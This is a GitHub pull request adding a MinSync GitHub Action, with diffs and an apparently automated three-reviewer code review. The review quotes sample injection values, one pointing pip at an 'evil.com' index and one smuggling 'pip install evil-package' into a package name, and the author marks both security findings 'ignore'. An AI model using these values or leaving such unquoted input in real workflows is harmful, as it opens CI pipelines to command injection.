### PR TITLE
GitHub Actions official action for PR auto-sync

### LINKED ISSUE #11: GitHub Actions official action for PR auto-sync
## Summary
\`uses: NomaDamas/minsync-action@v1\`로 PR마다 자동 sync + 변경 요약 코멘트를 달 수 있는 공식 GitHub Action.

## Features
- PR push 시 자동 incremental sync
- 변경된 청크 수, 파일 목록을 PR 코멘트로 요약
- verify 결과도 포함
- 시크릿으로 embedding API key 전달

🤖 Generated with [Claude Code](https://claude.com/claude-code)

### PR DESCRIPTION
**Pull request by vkehfdl1**
## Summary

Add an official GitHub Action (`uses: NomaDamas/MinSync@v1`) that automates vector index sync on pull requests and posts a summary comment.

### Changes
- `action.yml` — Composite action definition with 14 inputs, 7 outputs, 5 steps (setup-python, pip install, minsync init, sync+verify, PR comment)
- `action/entrypoint.py` — Python script that orchestrates `minsync sync --format json` and `minsync verify --format json`, writes GitHub Actions outputs
- `action/comment.py` — PR comment Markdown formatter with HTML marker (`<!-- minsync-action -->`) for create-or-update deduplication
- `tests/acceptance/test_action_comment.py` — 12 unit tests covering all comment formatting edge cases

### Features
- Automatic incremental sync on PR push events
- Configurable embedder, chunker, python version, extra packages
- Optional verify step after sync
- PR comment with sync metrics (chunks added/updated/deleted, files processed) and verify status
- Comment deduplication via HTML marker (updates existing comment on subsequent runs)
- Sync failure → action failure; verify failure → warning only

## Original Issue

`uses: NomaDamas/minsync-action@v1`로 PR마다 자동 sync + 변경 요약 코멘트를 달 수 있는 공식 GitHub Action.

close #11

### CODE REVIEW

File: action.yml [hunk 1]
```diff
@@ -0,0 +1,162 @@
...
+
+    - name: Install MinSync and dependencies
+      shell: bash
+      working-directory: ${{ inputs.working-directory }}
+      run: |
+        pkg="MinSync"
+        if [ -n "${{ inputs.minsync-extra }}" ]; then
+          pkg="MinSync[${{ inputs.minsync-extra }}]"
+        fi
+        if [ "${{ inputs.minsync-version }}" != "latest" ]; then
```
Comment (vkehfdl1) [inline action.yml:103]: **Code Review Debate** (2/3 reviewers flagged this)

:red_circle: **Devil's Advocate**: `inputs.embedding-packages` is directly interpolated into `pip install` without quoting. A value like `--index-url https://evil.com foo` would inject arbitrary pip flags.

:white_circle: **Neutral Judge**: The input is unquoted in the shell command. While this runs in CI, a careless user could supply arguments that change pip behavior.

:green_circle: **Approval Advocate**: No concerns raised for this code.

**Suggested Fix**: Quote the variable or iterate over packages safely.
**Risk Level**: HIGH (Probability: MEDIUM, Impact: HIGH)

File: action/entrypoint.py [hunk 2]
```diff
@@ -0,0 +1,126 @@
...
+    output_file = os.environ.get("GITHUB_OUTPUT", "")
+    if output_file:
+        with open(output_file, "a") as fh:
+            fh.write(f"{name}={value}\n")
+
+
+def _write_multiline_output(name: str, value: str) -> None:
+    output_file = os.environ.get("GITHUB_OUTPUT", "")
+    if output_file:
+        with open(output_file, "a") as fh:
```
Comment (vkehfdl1) [inline action/entrypoint.py:34]: **Code Review Debate** (2/3 reviewers flagged this)

:red_circle: **Devil's Advocate**: `_write_multiline_output` uses a hardcoded `EOF` delimiter. If the output value itself contains `EOF` on its own line, the GitHub Actions output parser will terminate early, silently truncating the output.

:white_circle: **Neutral Judge**: The `EOF` heredoc delimiter could collide with output content. Probability is low since minsync JSON output is unlikely to contain a bare `EOF` line, but impact would be silent data corruption in the output.

:green_circle: **Approval Advocate**: No concerns raised for this code.

**Suggested Fix**: Use a unique delimiter like a UUID: `delimiter = uuid.uuid4().hex` and use `{name}<<{delimiter}\n{value}\n{delimiter}\n`.
**Risk Level**: MEDIUM (Probability: LOW, Impact: MEDIUM)

File: action/entrypoint.py [hunk 3]
```diff
@@ -0,0 +1,126 @@
...
+
+def _run_sync() -> tuple[dict[str, Any] | None, str | None]:
+    ref = os.environ.get("INPUT_REF", "")
+    sync_args = os.environ.get("INPUT_SYNC_ARGS", "")
+
+    sync_cmd = ["minsync", "sync", "--format", "json"]
+    if ref:
+        sync_cmd += ["--ref", ref]
+    if sync_args:
+        sync_cmd += sync_args.split()
```
Comment (vkehfdl1) [inline action/entrypoint.py]: **Code Review Debate** (2/3 reviewers flagged this)

:red_circle: **Devil's Advocate**: `sync_args.split()` uses naive whitespace splitting. If a user passes `--ref "my branch"` in `sync-args`, it will be split into `["--ref", "\"my", "branch\""]`, breaking the command. This also affects `verify_args.split()`.

:white_circle: **Neutral Judge**: Simple `.split()` is insufficient for shell-like argument parsing. A user providing `sync-args: '--batch-size 128'` would work, but `'--ref "feature branch"'` would break silently.

:green_circle: **Approval Advocate**: No concerns raised for this code.

**Suggested Fix**: Use `shlex.split(sync_args)` instead of `sync_args.split()` for proper shell-like tokenization. Same for `verify_args`.
**Risk Level**: MEDIUM (Probability: MEDIUM, Impact: MEDIUM)

File: action.yml [hunk 4]
```diff
@@ -0,0 +1,162 @@
...
+runs:
+  using: composite
+  steps:
+    - name: Set up Python
+      uses: actions/setup-python@v5
+      with:
+        python-version: ${{ inputs.python-version }}
+
+    - name: Install MinSync and dependencies
+      shell: bash
```
Comment (vkehfdl1) [inline action.yml:96]: **Code Review Note** (1/3 reviewers flagged this)

**Devil's Advocate**: `inputs.minsync-extra` is injected directly into bracket syntax `MinSync[${{ inputs.minsync-extra }}]`. A value like `zvec]; pip install evil-package; echo [` would break out of the intended command.
**Other reviewers**: No concerns raised.
**Severity**: MEDIUM | **Category**: Security vulnerabilities

**Suggested Fix**: Validate the extra input against a simple pattern (alphanumeric + commas) or quote the entire `pkg` variable more carefully.

File: action.yml [hunk 5]
```diff
@@ -0,0 +1,162 @@
...
+          minsync init \
+            --embedder "${{ inputs.embedder }}" \
+            --chunker "${{ inputs.chunker }}"
+        fi
+      env:
+        OPENAI_API_KEY: ${{ inputs.embedding-api-key }}
+
+    - name: Run MinSync sync and verify
+      id: run
+      shell: bash
```
Comment (vkehfdl1) [inline action.yml:121]: **Code Review Debate** (2/3 reviewers flagged this)

:red_circle: **Devil's Advocate**: The action hardcodes `OPENAI_API_KEY` as the env var name. Users with non-OpenAI providers (Cohere, Voyage, etc.) must set their own env vars separately in the workflow, but the `embedding-api-key` input name implies it would be the only key needed.

:white_circle: **Neutral Judge**: The hardcoded `OPENAI_API_KEY` mapping is pragmatic for the default `openai:text-embedding-3-small` embedder. Non-OpenAI users can set env vars directly in their workflow. The documentation should clarify this.

:green_circle: **Approval Advocate**: No concerns raised for this code.

**Suggested Fix**: Acceptable as-is for v1. Consider adding an `embedding-api-key-name` input in a future version, or document the workaround in README.
**Risk Level**: MEDIUM (Probability: LOW, Impact: LOW)

**Comment by vkehfdl1** [comment]
## /refactor Code Review Summary

### Results

| Classification | Count | Action |
|----------------|-------|--------|
| Unanimous (3/3) | 0 | Auto-fixed |
| Majority (2/3) | 4 | Inline comment |
| Single (>= MEDIUM) | 1 | Inline comment |
| Single (LOW) | 2 | Skipped |
| **Total findings** | **7** | |

### Auto-Fixed Issues
No issues were unanimously identified for auto-fix.

### Inline Comments Posted
- `action.yml:99`: Unquoted `embedding-packages` input allows pip argument injection (Majority)
- `action/entrypoint.py:31`: `EOF` multiline delimiter could collide with output content (Majority)
- `action/entrypoint.py:43`: `sync_args.split()` breaks on quoted arguments with spaces (Majority)
- `action.yml:92`: `minsync-extra` input injected into bracket syntax without validation (Single)
- `action.yml:118`: Hardcoded `OPENAI_API_KEY` env var assumes OpenAI provider (Majority)

### Top Strengths (from Approval Advocate)
1. Clean separation of concerns: `comment.py` (formatting), `entrypoint.py` (orchestration), `action.yml` (workflow integration) are completely decoupled
2. Defensive coding with `.get()` fallbacks and graceful error semantics (sync fail = exit 1, verify fail = warning only)
3. Comprehensive 12-test suite covering all comment formatting edge cases including initial sync, collapsible file lists, verify failures, and empty results

### Reviewer Verdicts
- :red_circle: **Devil's Advocate**: Multiple shell injection vectors in action.yml inputs need quoting/validation; naive string splitting in entrypoint.py will break on complex arguments.
- :white_circle: **Neutral Judge**: Well-structured action with good defaults; main risks are in shell input handling (medium probability) and the EOF delimiter (low probability). Overall acceptable with minor hardening.
- :green_circle: **Approval Advocate**: Strong PR delivering real CI/CD value with clean architecture, thorough tests, and good error handling. No critical issues found.

---
*Generated by `/refactor` -- 3-agent code review debate*

File: action.yml (hunk 4 above)
Comment (vkehfdl1) [reply action.yml:96]: ignore

File: action.yml (hunk 1 above)
Comment (vkehfdl1) [reply action.yml:103]: ignore

File: action.yml (hunk 5 above)
Comment (vkehfdl1) [reply action.yml:121]: approve. Needs embedding-api-key-name now.

File: action/entrypoint.py (hunk 3 above)
Comment (vkehfdl1) [reply action/entrypoint.py]: approve

File: action/entrypoint.py (hunk 2 above)
Comment (vkehfdl1) [reply action/entrypoint.py:34]: approve
